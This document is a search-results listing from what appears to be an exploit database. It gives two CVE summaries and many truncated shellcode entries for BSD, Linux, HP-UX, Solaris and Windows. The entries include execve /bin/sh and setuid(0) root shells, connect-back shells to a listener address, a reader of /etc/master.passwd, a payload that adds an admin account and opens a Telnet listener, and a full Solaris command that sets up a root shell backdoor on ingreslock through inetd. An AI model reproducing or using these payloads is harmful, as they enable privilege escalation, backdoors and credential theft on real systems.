3386 matches found
CVE-2009-0824
CVE-2009-0824 affects ElbyCDIO.sys and related SlySoft/Elby components (AnyDVD before 6.5.2.6, Virtual CloneDrive 5.4.2.3 and earlier, CloneDVD 2.9.2.0 and earlier, CloneCD 5.3.1.3 and earlier). The issue is a buffer validation problem in IOCTL handling using METHOD_NEITHER, allowing a local atta...
CVE-2009-0824
Elaborate Bytes ElbyCDIO.sys 6.0.2.0 and earlier, as distributed in SlySoft AnyDVD before 6.5.2.6, Virtual CloneDrive 5.4.2.3 and earlier, CloneDVD 2.9.2.0 and earlier, and CloneCD 5.3.1.3 and earlier, uses the METHODNEITHER communication method for IOCTLs and does not properly validate a buffer...
kernel: dell_rbu local oops
drivers/firmware/dellrbu.c in the Linux kernel before 2.6.27.13, and 2.6.28.x before 2.6.28.2, allows local users to cause a denial of service system crash via a read system call that specifies zero bytes from the 1 imagetype or 2 packetsize file in /sys/devices/platform/dellrbu/...
Hp-ux - execve(/bin/sh) - 58 bytes
No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...
linux/x86 Perl script execution 99 bytes + script length
Exploit for linux/x86 platform in category shellcode ======================================================== linux/x86 Perl script execution 99 bytes + script length ======================================================== / Author : darkjoker Site : http://darkjoker.net23.net Shellcode :...
linux/x86 File unlinker 18 bytes + file path length
linux/x86 File unlinker 18 bytes + file path length. Shellcode exploit for linx86 platform / Author : darkjoker Site : http://darkjoker.net23.net Shellcode : linux/x86 File unlinker 18 bytes + file path length .global start start: jmp one two: pop %ebx movb $0xa,%al int $0x80 movb $0x1, %al xor...
NetBSD/x86 - setreuid(0, 0); execve("/bin//sh", ..., NULL); - 29 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include "sys/types.h" include "stdio.h" include "string.h" char scode = "\x9...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
NetBSD/x86 - execve(/bin/sh) - 68 bytes
No description provided by source. / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"...
Solaris/x86 - add services and execve inetd - 201 bytes
No description provided by source. / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;" "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x"; for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. / char c0de =...
linux/x86 file reader 65 bytes + pathname
No description provided by source. / Linux/x86 file reader. 65 bytes + pathname Author: certaindeath Source code: start: xor %eax, %eax xor %ebx, %ebx xor %ecx, %ecx xor %edx, %edx jmp two one: pop %ebx movb $5, %al xor %ecx, %ecx int $0x80 mov %eax, %esi jmp read exit: movb $1, %al xor %ebx, %eb...
win32 telnetbind by winexec 111 bytes
win32 telnetbind by winexec 111 bytes. Shellcode exploit for win32 platform ; payload:add admin acount & Telnet Listening ; Author: DATASNIPER ; size:111 bytes ; platform:WIN32/XP SP2 FR ; thanks:Arab4services team & AT4RE Team ; more info: visit my blog http://datasniper.arab4services.net ; The...
win32 PEB!NtGlobalFlags shellcode 14 bytes
win32 PEB!NtGlobalFlags shellcode 14 bytes. Shellcode exploit for win32 platform / PEB!NtGlobalFlags 14 BYTES Author: Koshi Description: Uses PEB method to determine whether a debugger is attached to the running proccess or not. No 9x. : Length: 14 Bytes Registers Used: EAX,ESI,ESP Compiled:...
win32 PEB!NtGlobalFlags shellcode 14 bytes
Exploit for win32 platform in category shellcode ========================================== win32 PEB!NtGlobalFlags shellcode 14 bytes ========================================== / PEB!NtGlobalFlags 14 BYTES Author: Koshi Description: Uses PEB method to determine whether a debugger is attached to...
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
Linux/x86 - connect-back 127.0.0.1:31337/tcp - 74 bytes
No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...
Linux/x86-64bits - execve("/bin/sh", ["/bin/sh"], NULL) - 33 bytes
No description provided by source. Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%...
Linux/x86 - Connect-Back port UDP/54321 - 151 bytes
No description provided by source. / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / // // / //|// //// //,//,/ xenomuta arroba phreaker punto...
Linux/sparc - connect back - 216 bytes
No description provided by source. / linux sparc connect back shellcode, because someone had to evade those firewalls. sigh / / OS : Linux Architecture : Sparc Type : Connect Back Lenght : 216 Bytes Listen-Port : 2313/TCP Default IP : 192.168.100.1 see how you'll change it at the end. null bytes...